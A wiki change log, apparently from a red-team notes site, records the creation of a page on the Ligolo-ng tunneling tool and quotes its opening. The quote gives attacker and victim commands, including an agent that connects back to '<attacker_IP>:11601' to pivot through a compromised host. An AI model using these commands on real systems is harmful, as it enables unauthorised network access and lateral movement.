Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 04:58, 21 August 2023 Ali3nw3rx talk contribs created page Ligolo-Ng (Created page with "== Usage: == Attacker:<syntaxhighlight lang="powershell"> sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert </syntaxhighlight>Victim:<syntaxhighlight lang="powershell"> ./agent -connect <attacker_IP>:11601 -ignore-cert </syntaxhighlight>Start the tunneling:<syntaxhighlight lang="powershell"> session 1 Start </syntaxhighlight>Add Listener:<syntaxhighlight lang="powershell"> listener_add --addr 0.0.0.0:1234 --to 127.0....") Tag: Visual edit